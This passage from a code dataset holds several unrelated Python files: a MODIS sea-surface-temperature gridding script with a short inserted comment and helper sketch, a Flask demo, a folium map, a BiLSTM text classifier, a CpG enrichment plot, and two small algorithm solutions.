str(Nlat), str(resolution)))\\\n and os.path.exists('{0}{1}_{2}_{3}_{4}_{5}_{6}_{7}_{8}_info.txt'\\\n .format(save_dir_name, DATAFIELD_NAME, proc_date[0].strftime('%Y%m%d'), proc_date[1].strftime('%Y%m%d'), \n str(Llon), str(Rlon), str(Slat), str(Nlat), str(resolution))) :\n \n print(('{0}{1}_{2}_{3}_{4}_{5}_{6}_{7}_{8} files are exist...'\\\n .format(save_dir_name, DATAFIELD_NAME, proc_date[0].strftime('%Y%m%d'), proc_date[1].strftime('%Y%m%d'), \n str(Llon), str(Rlon), str(Slat), str(Nlat), str(resolution))))\n \n else : \n\n if len(df_proc) != 0 :\n \n print(\"df_proc: {}\".format(df_proc))\n \n processing_log = \"#This file is created using Python : https://github.com/guitar79/KOSC_MODIS_SST_Python\\n\"\n processing_log += \"#L3_perid = {}, start date = {}, end date = {}\\n\"\\\n .format(L3_perid, proc_date[0].strftime('%Y%m%d'), proc_date[1].strftime('%Y%m%d'))\n \n processing_log += \"#Llon = {}, Rlon = {}, Slat = {}, Nlat = {}, resolution = {}\\n\"\\\n .format(str(Llon), str(Rlon), str(Slat), str(Nlat), str(resolution))\n \n # make lat_array, lon_array, array_data\n print(\"{0}-{1} Start making grid arrays...\\n\".\\\n format(proc_date[0].strftime('%Y%m%d'), proc_date[1].strftime('%Y%m%d')))\n array_data = MODIS_hdf_utilities.make_grid_array(Llon, Rlon, Slat, Nlat, resolution)\n \n print('Grid arrays are created...........\\n')\n \n total_data_cnt = 0\n file_no = 0\n processing_log += '#processing file list\\n'\n processing_log += '#file No, data_count, filename, hdf_attribute\\n'\n\n for fullname in df_proc[\"fullname\"] : \n fullname_el = fullname.split(\"/\")\n array_alldata = array_data.copy()\n\n print(\"Reading hdf file {0}\\n\".format(fullname))\n hdf_raw, latitude, longitude, cntl_pt_cols, cntl_pt_rows \\\n = MODIS_hdf_utilities.read_MODIS_hdf_to_ndarray(fullname, DATAFIELD_NAME)\n \n hdf_value = hdf_raw[:,:]\n \n if 'bad_value_scaled' in hdf_raw.attributes() :\n #hdf_value[hdf_value == hdf_raw.attributes()['bad_value_scaled']] = np.nan\n hdf_value = np.where(hdf_value == hdf_raw.attributes()['bad_value_scaled'], np.nan, hdf_value)\n print(\"'bad_value_scaled' data is changed to np.nan...\\n\")\n\n elif 'fill_value' in hdf_raw.attributes() :\n #hdf_value[hdf_value == hdf_raw.attributes()['fill_value']] = np.nan\n hdf_value = np.where(hdf_value == hdf_raw.attributes()['fill_value'], np.nan, hdf_value)\n print(\"'fill_value' data is changed to np.nan...\\n\")\n \n elif '_FillValue' in hdf_raw.attributes() :\n #hdf_value[hdf_value == hdf_raw.attributes()['_FillValue']] = np.nan\n hdf_value = np.where(hdf_value == hdf_raw.attributes()['_FillValue'], np.nan, hdf_value)\n print(\"'_FillValue' data is changed to np.nan...\\n\")\n \n else :\n hdf_value = np.where(hdf_value == hdf_value.min(), np.nan, hdf_value)\n print(\"Minium value of hdf data is changed to np.nan ...\\n\")\n \n if 'valid_range' in hdf_raw.attributes() :\n #hdf_value[hdf_value < hdf_raw.attributes()['valid_range'][0]] = np.nan\n #hdf_value[hdf_value > hdf_raw.attributes()['valid_range'][1]] = np.nan\n \n hdf_value = np.where(hdf_value < hdf_raw.attributes()['valid_range'][0], np.nan, hdf_value)\n hdf_value = np.where(hdf_value > hdf_raw.attributes()['valid_range'][1], np.nan, hdf_value)\n print(\"invalid_range data changed to np.nan...\\n\")\n \n if 'scale_factor' in hdf_raw.attributes() and 'add_offset' in hdf_raw.attributes() :\n scale_factor = hdf_raw.attributes()['scale_factor']\n offset = hdf_raw.attributes()['add_offset']\n\n elif 'slope' in hdf_raw.attributes() and 'intercept' in hdf_raw.attributes() :\n 
scale_factor = hdf_raw.attributes()['slope']\n offset = hdf_raw.attributes()['intercept']\n \n else : \n scale_factor, offset = 1, 0\n \n hdf_value = np.asarray(hdf_value)\n hdf_value = hdf_value * scale_factor + offset\n \n #print(\"latitude: {}\".format(latitude))\n #print(\"longitude: {}\".format(longitude))\n print(\"hdf_value: {}\".format(hdf_value))\n print(\"str(hdf_raw.attributes()): {}\".format(str(hdf_raw.attributes())))\n print(\"np.shape(latitude): {}\".format(np.shape(latitude))) \n print(\"np.shape(longitude): {}\".format(np.shape(longitude)))\n print(\"np.shape(hdf_value): {}\".format(np.shape(hdf_value)))\n print(\"len(cntl_pt_cols): {}\".format(len(cntl_pt_cols)))\n print(\"len(cntl_pt_rows): {}\".format(len(cntl_pt_rows)))\n \n if np.shape(latitude) == np.shape(longitude) : \n if np.shape(longitude)[0] != np.shape(hdf_value)[0] :\n print(\"np.shape(longitude)[0] != np.shape(hdf_value)[0] is true...\")\n row = 0\n longitude_new = np.empty(shape=(np.shape(hdf_value)))\n for row in range(len(longitude[0])) :\n for i in range(len(cntl_pt_rows)-1) :\n longitude_value = np.linspace(longitude[row,i], longitude[row,i+1], cntl_pt_rows[i])\n for j in range(i) :\n longitude_new[row, row+j] = longitude_value[j] \n #print(\"np.shape(longitude_new): {}\".format(np.shape(longitude_new)))\n longitude = longitude_new.copy()\n \n elif np.shape(longitude)[1] != np.shape(hdf_value)[1] :\n print(\"np.shape(longitude)[1] != np.shape(hdf_value)[1] is true...\")\n col = 0\n longitude_new = np.empty(shape=(np.shape(hdf_value)))\n for row in range(len(longitude[1])) :\n for i in range(len(cntl_pt_cols)-1) :\n longitude_value = np.linspace(longitude[row,i], \\\n longitude[row,i+1], \\\n cntl_pt_cols[i+1]-cntl_pt_cols[i]+1)\n #print(\"longitude_value {}: {}\".format(i, latitude_value))\n #print(\"{0}, cntl_pt_cols[{1}]-cntl_pt_cols[{0}] : {2})\"\\\n # .format(i, i+1, cntl_pt_cols[i+1]-cntl_pt_cols[i]))\n for j in range(len(longitude_value)-1) :\n longitude_new[row, cntl_pt_cols[i]-1+j] = longitude_value[j] \n longitude_new[row, np.shape(longitude_new)[1]-1] = longitude[row, np.shape(longitude)[1]-1]\n #print(\"np.shape(longitude_new): {}\".format(np.shape(longitude_new)))\n longitude = longitude_new.copy()\n longitude = np.asarray(longitude)\n #print(\"type(longitude): {}\".format(type(longitude)))\n print(\"np.shape(longitude): {}\".format(np.shape(longitude)))\n \n if np.shape(latitude)[0] != np.shape(hdf_value)[0] :\n print(\"np.shape(latitude)[0] != np.shape(hdf_value)[0] is not same...\")\n row = 0\n latitude_new = np.empty(shape=(np.shape(hdf_value)))\n for row in range(len(latitude[0])) :\n for i in range(len(cntl_pt_rows)-1) :\n latitude_value = np.linspace(latitude[row,i], latitude[row,i+1], cntl_pt_rows[i])\n for j in range(i) :\n latitude_new[row, row+j] = latitude_value[j] \n print(\"np.shape(latitude_new): {}\".format(np.shape(latitude_new)))\n latitude = latitude_new.copy()\n \n elif np.shape(latitude)[1] != np.shape(hdf_value)[1] :\n print(\"np.shape(latitude)[1] != np.shape(hdf_value)[1] is true...\")\n col = 0\n latitude_new = np.empty(shape=(np.shape(hdf_value)))\n for row in range(len(latitude[1])) :\n for i in range(len(cntl_pt_cols)-1) :\n latitude_value = np.linspace(latitude[row,i], \\\n latitude[row,i+1], \\\n cntl_pt_cols[i+1]-cntl_pt_cols[i]+1)\n #print(\"latitude_value {}: {}\".format(i, latitude_value))\n #print(\"{0}, cntl_pt_cols[{1}]-cntl_pt_cols[{0}] : {2})\"\\\n # .format(i, i+1, cntl_pt_cols[i+1]-cntl_pt_cols[i]))\n for j in range(len(latitude_value)-1) :\n 
latitude_new[row, cntl_pt_cols[i]-1+j] = latitude_value[j] \n latitude_new[row, np.shape(latitude_new)[1]-1] = latitude[row, np.shape(latitude)[1]-1]\n print(\"np.shape(latitude_new): {}\".format(np.shape(latitude_new)))\n latitude = latitude_new.copy()\n latitude = np.asarray(latitude)\n #print(\"type(latitude): {}\".format(type(latitude)))\n print(\"np.shape(latitude): {}\".format(np.shape(latitude)))\n \n\n if np.shape(latitude) == np.shape(hdf_value) \\\n and np.shape(longitude) == np.shape(hdf_value) :\n \n #longitude[longitude < Llon] = np.nan\n #longitude[longitude > Rlon] = np.nan\n #latitude[latitude > Nlat] = np.nan\n #latitude[latitude < Slat] = np.nan\n \n longitude = np.where(longitude < Llon, np.nan, longitude)\n longitude = np.where(longitude > Rlon, np.nan, longitude)\n latitude = np.where(latitude > Nlat, np.nan, latitude)\n latitude = np.where(latitude < Slat, np.nan, latitude)\n \n #lon_cood = np.array((((longitude-Llon)/resolution*100)//100), dtype=np.uint16)\n #lat_cood = np.array((((Nlat-latitude)/resolution*100)//100), dtype=np.uint16)\n \n lon_cood = np.array(((longitude-Llon)/resolution*100)//100)\n lat_cood = np.array(((Nlat-latitude)/resolution*100)//100)\n \n #print(\"longitude: {}\".format(longitude))\n print(\"np.shape(lon_cood): {}\".format(np.shape(lon_cood)))\n #print(\"lon_cood: {}\".format(lon_cood))\n \n #print(\"latitude: {}\".format(latitude))\n print(\"np.shape(lat_cood): {}\".format(np.shape(lat_cood)))\n #print(\"lat_cood: {}\".format(lat_cood))\n print(\"hdf_value: {}\".format(hdf_value))\n data_cnt = 0\n NaN_cnt = 0\n for i in range(np.shape(lon_cood)[0]) :\n for j in range(np.shape(lon_cood)[1]) :\n if longitude[i,j] <= Rlon and longitude[i,j] >= Llon \\\n and latitude[i,j] <= Nlat and latitude[i,j] >= Slat \\\n and not np.isnan(hdf_value[i][j]) :\n data_cnt += 1\n #array_alldata[int(lon_cood[i][j])][int(lat_cood[i][j])].append(hdf_value[i][j])\n array_alldata[int(lon_cood[i][j])][int(lat_cood[i][j])].append((fullname_el[-1], hdf_value[i][j]))\n \n #print(\"array_alldata[{}][{}].append({})\"\\\n # .format(int(lon_cood[i][j]), int(lat_cood[i][j]), hdf_value[i][j]))\n #print(\"{} data added...\".format(data_cnt))\n \n file_no += 1\n total_data_cnt += data_cnt\n\n processing_log += \"{0}, {1}, {2}, {3}\\n\"\\\n .format(str(file_no), str(data_cnt), str(fullname), str(hdf_raw.attributes()))\n else :\n print(\"np.shape(latitude) == np.shape(hdf_value) and np.shape(longitude == np.shape(hdf_value) is not true...\")\n \n processing_log += '#total data number =' + str(total_data_cnt) + '\\n'\n \n #print(\"array_alldata: {}\".format(array_alldata))\n #print(\"prodessing_log: {}\".format(processing_log))\n \n np.save('{0}{1}_{2}_{3}_{4}_{5}_{6}_{7}_{8}_alldata.npy'\\\n .format(save_dir_name, DATAFIELD_NAME, \n proc_date[0].strftime('%Y%m%d'), proc_date[1].strftime('%Y%m%d'), \n str(Llon), str(Rlon), str(Slat), str(Nlat), str(resolution)), array_alldata)\n \n with open('{0}{1}_{2}_{3}_{4}_{5}_{6}_{7}_{8}_info.txt'\\\n .format(save_dir_name, DATAFIELD_NAME, \\\n proc_date[0].strftime('%Y%m%d'), proc_date[1].strftime('%Y%m%d'), \\\n str(Llon), str(Rlon), str(Slat), str(Nlat), str(resolution)), 'w') as f:\n f.write(processing_log)\n print('#'*60)\n MODIS_hdf_utilities.write_log(log_file, \\\n '{0}{1}_{2}_{3}_{4}_{5}_{6}_{7}_{8} files are is created.'\\\n .format(save_dir_name, DATAFIELD_NAME, \\\n proc_date[0].strftime('%Y%m%d'), proc_date[1].strftime('%Y%m%d'), \\\n str(Llon), str(Rlon), str(Slat), str(Nlat), str(resolution)))\n \n else :\n print(\"There is no 
data in {0} - {1} ...\\n\"\\\n .format(proc_date[0].strftime('%Y%m%d'), proc_date[1].strftime('%Y%m%d')))\n \n","sub_path":"classify_MODIS_hdf_SST.py","file_name":"classify_MODIS_hdf_SST.py","file_ext":"py","file_size_in_byte":18734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
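Note that the script above imports _MODIS_AOD_utilities but calls MODIS_hdf_utilities; the real helpers live in the KOSC_MODIS_SST_Python repository. A stand-in sketch of the two helpers used before the hdf loop, with assumed signatures and an assumed filename layout:

from datetime import datetime

def fullname_to_datetime_for_KOSC_MODIS_SST(fullname):
    # assumed filename layout 'AYYYYDDD.HHMM...hdf' (year, day-of-year, time);
    # the real parser in MODIS_hdf_utilities may differ
    stem = fullname.split('/')[-1]
    return datetime.strptime(stem[1:13], '%Y%j.%H%M')

def make_grid_array(Llon, Rlon, Slat, Nlat, resolution):
    # one empty accumulator list per grid cell; the classification loop above
    # appends (filename, value) tuples into these cells
    n_lon = int(round((Rlon - Llon) / resolution))
    n_lat = int(round((Nlat - Slat) / resolution))
    return [[[] for _ in range(n_lat)] for _ in range(n_lon)]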
+{"seq_id":"628544067","text":"from flask import Flask, request, url_for\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n return 'hola mundo'\n\n# GET, POST, PUT, PATCH, DELETE\n@app.route('/post/', methods=['GET', 'POST'])\ndef lala(post_id):\n if request.method == 'GET':\n return 'El id del post es: ' + post_id\n else:\n return 'Este es otro método y no GET'\n\n@app.route('/lele', methods=['POST'])\ndef lele():\n print(url_for('lala', post_id=2))\n print(request.form)\n print(request.form['llave1'])\n print(request.form['llave2'])\n return 'lele'\n","sub_path":"Flask/intro-flask/holamundo.py","file_name":"holamundo.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"517254741","text":"import folium\nfrom getJson import get_json_aviones, get_json_buques\n\n\ndef mapa():\n mapa = folium.Map(\n location=[-33.1, -71.7],\n zoom_start=9\n )\n \n for value in filter(lambda x: isinstance(x, list), get_json_aviones().values()):\n \n folium.CircleMarker(location=[value[1], value[2]],\n radius=10,\n fill_color='#cccc00',\n fill_opacity=0.8).add_to(mapa)\n \n for dic in get_json_buques():\n \n folium.CircleMarker(location=[float(dic['LAT']), float(dic['LON'])],\n radius=10,\n fill_color='#551a8b',\n fill_opacity=0.8).add_to(mapa)\n \n filename = 'map.html'\n \n mapa.save(filename)\n","sub_path":"Python/mapping.py","file_name":"mapping.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"613817994","text":"\"\"\"\nThis file contains the implementation of the BiLSTM Classifier class. This class is essentially a wrapper\nclass around the BiLSTM model, handling the loading of the datafiles and the setting up of the training\nprocedure.\n\"\"\"\nimport torch\nimport torchtext\nimport pandas as pd\nimport torch.nn as nn\nimport torch.optim as optim\nfrom typing import List, Union\nfrom models.bilstm import BiLSTM\nfrom configurations import ROOT_DIR\nfrom torch.optim.lr_scheduler import StepLR\nfrom code_utils.csvdataset import CSVDataset\nfrom code_utils.dataloader import CustomDataLoader\nfrom torchtext.data import Example, Iterator, Field\nfrom code_utils.utils import embeddings_available, download_word_embeddings_nl, single_task_class_weighting,\\\n generic_training, generic_evaluation\n\n\nclass BiLSTMClassifier:\n \"\"\"\n This class implements a Bidirectional LSTM classifier based on the version from PyTorch\n It deals with the various aspects of the training, such as converting the data into the appropriate\n format and logging the training process via TensorBoard\n\n Attributes\n ----------\n device: torch.device\n torch.device indicating on which device the model and the inputs should be, either on the GPU or the\n CPU. The default behaviour is to put the model and the inputs on the GPU when available.\n\n model: nn.Module\n The main model used for classification, in this case the Bidirectional LSTM model\n\n num_outputs: int\n Integer specifying the number of outputs of the model. This should be set to the number of unique classes\n in the dataset. (the 'get_num_labels_from_file' method can be used to retrieve this from the csv file\n when this is not known)\n\n has_trained: bool\n Boolean specifying whether the model has already been trained. This is used to ensure that the evaluaton\n or scoring is not accidentally run on an untrained model.\n\n _TEXT: torchtext.data.Field\n torchtext.data.Field instance specifying several parameters of the reading of the data such as\n whether or not to convert all text to lowercase and the type and language of the tokenizer used.\n\n _words: list\n list with all the words present in the Dutch embedding file\n\n _embed_dict: dict\n dictionary mapping words in the embeddings file to indices into the embedding matrix\n\n _embeddings: torch.Tensor\n torch.Tensor of size [num_words, embedding_dim] containing the word embeddings\n\n _criterion nn.optim.Criterion\n criterion used for the training and evaluation of the model. 
This is saved in the train methods\n for later use in the evaluation methods\n\n _embed_dim: int\n Integer specifying the dimension of the embeddings used in the embedding file\n\n _label_names: list\n list containing the names of the unique labels in the dataset, this is used for converting the\n integer representation used in training back to the original labels for easier interpretation\n\n \"\"\"\n\n def __init__(self, num_outputs, hidden_dim=256, device=torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\"),\n word_embedding_path: str = ROOT_DIR+'/resources/word_embeddings/combined-320.tar/320/',\n max_seq_len=None):\n \"\"\"\n :param num_outputs: integer specifying the number of outputs of the model, when unknown in advance,\n this can be retrieved by using the 'get_num_labels_from_file' method\n :param hidden_dim: integer specifying the hidden dimension of the Bidirectional model\n :param device: torch.device specifying the device on which the inputs and the model should be put.\n By default the model will be put on the GPU if one is available\n :param word_embedding_path: string specifying the path of the word embedding text and pt files\n :param max_seq_len: the maximum length to which sentences are clipped, this can be used when some\n sentence are very long, which can cause memory issues when using larger batch sizes.\n \"\"\"\n # Load in the vectors when they are not already present in the package\n if not embeddings_available():\n download_word_embeddings_nl()\n print(\"--- Constructing the Pytorch embedding matrix file ---\")\n torchtext.vocab.Vectors('combined-320.txt', cache=word_embedding_path)\n\n vocab_data = torch.load(word_embedding_path+\"combined-320.txt.pt\")\n\n self.device = device\n\n self._words, self._embed_dict, self._embeddings, self._embed_dim = vocab_data\n\n self.model = BiLSTM(vocab=torch.zeros(size=(1, 1)), hidden_dim=hidden_dim, output_dim=num_outputs,\n device=device)\n\n self._TEXT = Field(lower=True, tokenize=\"spacy\", tokenizer_language=\"nl_core_news_sm\", include_lengths=True,\n batch_first=True, fix_length=max_seq_len)\n\n self.num_outputs = num_outputs\n\n self._criterion = None\n\n self._label_names = None\n\n self.has_trained = False\n\n def train_from_file(self, file_name: str, batch_size: int, num_epochs: int, delimiter: str = \",\",\n quotechar: str = '\"', text_col_name: str = 'text', label_col_name='label', learning_rate=1.0,\n logging_dir: str = ROOT_DIR+'/runs/') -> None:\n \"\"\"\n The main method of this class, implementing a training procedure for the model and handling\n the proper loading of the dataset\n\n :param file_name: string specifying the location and name of the file that contains the training dat\n :param batch_size: integer specifying the batch size, this will affect the size of the batches fed into the \\\n model this can be set lower if memory issues occur\n :param num_epochs: integer specifying the number of epochs for which the model is trained. 
The right amount of \\\n epochs can differ for different datasets and it is recommended to inspect the produced TensorBoard logs \\\n to see if the model has converged\n :param delimiter: string specifying the delimiter used in the training csv file\n :param quotechar: string specifying the quotechar used in the training csv file\n :param text_col_name: string specifying the name of the column containing the mails in the csv file\n :param label_col_name: string specifying the name of the column containing the labels of the mails in \\\n the csv file\n :param learning_rate: float specifying the learning rate of the model, this can affect the speed of \\\n convergence of the model\n :param logging_dir: directory to which the Tensorboard logging files are saved\n\n \"\"\"\n print(\"--- Starting with reading in the dataset ---\")\n dataset_loader = CSVDataset(text_field=self._TEXT, file_name=file_name)\n dataset = dataset_loader.load(delimiter=delimiter, quotechar=quotechar, text_col_name=text_col_name,\n label_col_name=label_col_name)\n print(\"--- Finished with reading in the dataset ---\")\n\n dloader = CustomDataLoader(dataset)\n data_iterator = dloader.construct_iterators(batch_size=batch_size, text_col_name=text_col_name,\n label_col_name=label_col_name)\n\n self._TEXT.vocab.set_vectors(self._embed_dict, self._embeddings, self._embed_dim)\n\n self.model.set_new_embedding_matrix(self._TEXT.vocab.vectors)\n self._label_names = dataset.fields[label_col_name].vocab.itos\n\n weights = single_task_class_weighting(data_iterator)\n criterion = nn.CrossEntropyLoss(weight=weights.to(self.device))\n self._criterion = criterion\n\n optimizer = optim.SGD(self.model.parameters(), lr=learning_rate)\n scheduler = StepLR(optimizer, step_size=50, gamma=0.9)\n\n generic_training(self.model, criterion, optimizer, scheduler, data_iterator, device=self.device,\n tensorboard_dir=logging_dir, n_epochs=num_epochs, clip_val=0.0)\n\n self.has_trained = True\n return None\n\n def classify_from_file(self, file_name, delimiter: str = \",\", quotechar: str = '\"', text_col_name: str = \"text\",\n batch_size: int = 64) -> list:\n \"\"\"\n\n method used for classifying a set of examples for a file with a trained classifier\n\n This method reads in a file, parses it into the correct format and classifies the contents\n of the file. 
Throws an error when the model is not trained.\n\n :param file_name: string specifying the location and name of the file that contains the training dat\n :param delimiter: string specifying the delimiter used in the training csv file\n :param quotechar: string specifying the quotechar used in the training csv file\n :param text_col_name: string specifying the name of the column containing the mails in the csv file\n :param batch_size: integer specifying the batch size, this will affect the size of the batches fed into \\\n the model this can be set lower if memory issues occur\n :return: returns a list of results, where the result indices from the model have been converted back \\\n to the original class names from the file\n \"\"\"\n assert self.has_trained\n\n strings = pd.read_csv(file_name, sep=delimiter, quotechar=quotechar)[text_col_name].tolist()\n\n if isinstance(strings, str):\n strings = [strings]\n if isinstance(strings, list):\n strings = [[string] for string in strings]\n\n fields = [('text', self._TEXT)]\n\n list_of_examples = [Example.fromlist(string, fields) for string in strings]\n dataset = torchtext.data.Dataset(list_of_examples, fields)\n\n data = Iterator(dataset, batch_size=batch_size, device=torch.device(\"cpu\"), sort=False, sort_within_batch=False,\n repeat=False, shuffle=False)\n\n predictions = []\n\n for item in data:\n x = item.text\n self.model.to(self.device)\n self.model = self.model.eval()\n outputs = self.model([x[0].to(self.device), x[1].to(self.device)])\n predictions.extend(outputs.detach().cpu().argmax(1).tolist())\n results = [self._label_names[i] for i in predictions]\n return results\n\n def classify_from_strings(self, strings: Union[List[str], str]) -> list:\n \"\"\"\n\n method that can be used for classifying one or multiple examples with a trained classifier\n\n :param strings: a single string or a list of strings representing the pieces of text that should be classified\n :return: list containing the predictions of the models for the inputted pieces of text\n \"\"\"\n assert self.has_trained\n if isinstance(strings, str):\n strings = [strings]\n if isinstance(strings, list):\n strings = [[string] for string in strings]\n\n fields = [('text', self._TEXT)]\n\n list_of_examples = [Example.fromlist(string, fields) for string in strings]\n dataset = torchtext.data.Dataset(list_of_examples, fields)\n\n data = Iterator(dataset, batch_size=1, device=torch.device(\"cpu\"), sort=False, sort_within_batch=False,\n repeat=False, shuffle=False)\n\n predictions = []\n\n for item in data:\n x = item.text\n self.model.to(self.device)\n self.model = self.model.eval()\n outputs = self.model([x[0].to(self.device), x[1].to(self.device)])\n predictions.extend(outputs.detach().cpu().argmax(1).tolist())\n results = [self._label_names[i] for i in predictions]\n return results\n\n def score(self, file_name: str, delimiter: str = \",\", quotechar='\"', text_col_name: str = 'text',\n label_col_name: str = 'label', batch_size: int = 64) -> None:\n \"\"\"\n\n method that can be used score that model on an unseen test file\n\n :param file_name: string specifying the location and name of the file that contains the training dat\n :param delimiter: string specifying the delimiter used in the training csv file\n :param quotechar: string specifying the quotechar used in the training csv file\n :param text_col_name: string specifying the name of the column containing the mails in the csv file\n :param label_col_name: string specifying the name of the column containing the labels of 
the mails \\\n in the csv file\n :param batch_size: integer specifying the batch size, this will affect the size of the batches fed into \\\n the model; this can be set lower if memory issues occur\n \"\"\"\n assert self.has_trained\n print(\"Evaluating model\")\n\n print(\"--- Starting with reading in the dataset ---\")\n dataset_loader = CSVDataset(text_field=self._TEXT, file_name=file_name)\n dataset = dataset_loader.load(delimiter=delimiter, quotechar=quotechar, text_col_name=text_col_name,\n label_col_name=label_col_name)\n print(\"--- Finished with reading in the dataset ---\")\n\n dloader = CustomDataLoader(dataset)\n data_iterator = dloader.construct_iterators(batch_size=batch_size, text_col_name=text_col_name,\n label_col_name=label_col_name, is_test_set=True)\n\n generic_evaluation(self.model, data_iterator, self._criterion, device=self.device)\n return None\n\n def save_model(self, filename: str) -> None:\n \"\"\"\n\n method that can be used to save a (trained) classifier\n\n :param filename: string specifying the location and name of the destination of the saved model\n \"\"\"\n assert filename.split(\".\")[-1] == \"pt\"\n torch.save(self.model.state_dict(), filename)\n return None\n\n def load_model(self, filename: str) -> None:\n \"\"\"\n\n method that can be used to load a classifier saved in the .pt format\n\n :param filename: string specifying the name and location of the saved model to be loaded\n \"\"\"\n assert filename.split(\".\")[-1] == \"pt\"\n self.model.load_state_dict(torch.load(filename))\n return None\n","sub_path":"models/bilstmclassifier.py","file_name":"bilstmclassifier.py","file_ext":"py","file_size_in_byte":14389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"170752493","text":"#!/usr/bin/env python3\n###Plot of Island Cpg Enrichment\n\nimport numpy as np\nimport argparse\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nmatplotlib.style.use('ggplot')\nimport seaborn as sns\nsns.set()\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-f1\" ,\"--file1\", help=\"Nombre del fichero bed de CpGs correlacionadas positivamente con la edad\")\nparser.add_argument(\"-f2\", \"--file2\", help=\"Nombre del fichero bed de CpGs correlacionadas negativamente con la edad\")\nparser.add_argument(\"-r\", \"--random\", help=\"Resultado de la randomizacion\")\nargs = parser.parse_args()\n\nhigh=list(open(args.file1))[0].split('\\t')\nlow=list(open(args.file2))[0].split('\\t')\nrandom=list(open(args.random))\n\ndata=[]\ndatap=[]\nfor i in range(0,len(random)):\n\tlinea=random[i].split('\\t')\n\tdata.append(int(linea[1].strip()))\n\tdatap.append(int(linea[1].strip())/45626*100)\n\nmaximum=np.max(data)\nminimum=np.min(data)\np99=np.percentile(data,99)\np95=np.percentile(data,95)\np05=np.percentile(data,5)\np01=np.percentile(data,1)\nmedia=np.average(data)\nmedian=np.median(data)\nstd=np.std(data)\nzscoreH= (int(high[1].strip()) - media)/std\nzscoreL= (int(low[1].strip()) - media)/std\n\n\n\nout=open('Enrichment_statistics.txt','wt')\nout.write('max\\tmin\\tmedia\\tmediana\\tpercentil 01\\tpercentil 05\\tpercentil 95\\tpercentil 99\\tstandard deviation\\tZscore +\\t Zscore -\\n')\nout.write('%f\\t%f\\t%f\\t%f\\t%f\\t%f\\t%f\\t%f\\t%f\\t%f\\t%f\\n' % (maximum, minimum, media, median, p01, p05, p95, p99, std, zscoreH, zscoreL))\nout.write('\\nRelative values in percentage\\n')\nout.write('%f\\t%f\\t%f\\t%f\\t%f\\t%f\\t%f\\t%f\\t%f\\t%f\\t%f\\n' % (maximum/45626*100, minimum/45626*100, media/45626*100, median/45626*100, p01/45626*100, p05/45626*100, p95/45626*100, p99/45626*100, std/45626*100, zscoreH, zscoreL))\n\n\nsns_plot2 = sns.distplot(datap, bins=20, label='Random CpG sites', axlabel='Percentage of correlated with age CpG sites in random region').set_title('Enrichment of Random Regions Analysis')\nsns_plot2 = plt.axvline(x=int(low[1].strip())/45626*100, label='Negatively correlated with age CpG sites', color='#2ca02c')\nsns_plot2 = plt.axvline(x=int(high[1].strip())/45626*100, label='Positively correlated with age CpG sites', color='#d62728')\nsns_plot2 = plt.legend(loc=2)\nfig=sns_plot2.get_figure()\nfig.savefig('Enrichment_hist.jpeg')\n\n\n\n\n","sub_path":"Enrichment_plot.py","file_name":"Enrichment_plot.py","file_ext":"py","file_size_in_byte":2313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"108512289","text":"class Solution:\n def getAllElements(self, root1, root2):\n def inorder(root, lst):\n if not root: return\n inorder(root.left, lst)\n lst.append(root.val)\n inorder(root.right, lst)\n \n lst1, lst2 = [], []\n inorder(root1, lst1)\n inorder(root2, lst2)\n \n i1, i2, res = 0, 0, []\n s1, s2 = len(lst1), len(lst2)\n \n while i1 < s1 and i2 < s2:\n if lst1[i1] < lst2[i2]:\n res += [lst1[i1]]\n i1 += 1\n else:\n res += [lst2[i2]]\n i2 += 1\n \n return res + lst1[i1:] + lst2[i2:]","sub_path":"September/Week1/Day5/allelementsinTwoBinaryTree.py","file_name":"allelementsinTwoBinaryTree.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"9356551","text":"#这一类问题属于寻找第n个符合某一条件的数,看到这种问题会有两种思考方式:\n#第一种:从第一个数开始判断,直到找到n个符合条件的数,\n#第二种:第k+1个满足条件的数,是不是可以由之前的k个已经确定满足条件的数求出\n#第一种复杂度较高\n#采用第二种方法实现:每一个新丑数都由已经求出的丑数乘2或乘3或乘5得到,\n#刚开始只有一个丑数1,那么由丑数1可以生成三个丑数1*2,1*3,1*5\n#新生成的三个丑数2,3,5最小的是2,那么由丑数2又可以生成三个丑数2*2,2*3,2*5,,那么\n#此时一共有2,3,5,4,6,10六个丑数\n#利用三个列表t2,t3,t5\n#每次生成一个丑数A都,将A*2添加到t2,将A*3添加到t3,,将A*5添加到t5,\n#每个列表的第一个元素代表\n\nclass Solution:\n def GetUglyNumber_Solution(self, n):\n if n==1:\n return n\n t2=[2]\n t3=[3]\n t5=[5]\n for i in range(2,n+1):\n minD=min(t2[0],min(t3[0],t5[0]))\n work=1\n if minD==t2[0]:\n t2.append(t2[0]*2)\n t3.append(t2[0]*3)\n t5.append(t2[0]*5)\n res=t2[0]\n work=0\n del t2[0]\n if minD==t3[0]:\n if work:\n t2.append(t3[0] * 2)\n t3.append(t3[0] * 3)\n t5.append(t3[0] * 5)\n res=t3[0]\n work=0\n del t3[0]\n if minD==t5[0]:\n if work:\n t2.append(t5[0] * 2)\n t3.append(t5[0] * 3)\n t5.append(t5[0] * 5)\n res=t5[0]\n del t5[0]\n return res\n\nSolution().GetUglyNumber_Solution(1)\n\n\n\n\n","sub_path":"newcode_GetUglyNumber_Solution.py","file_name":"newcode_GetUglyNumber_Solution.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
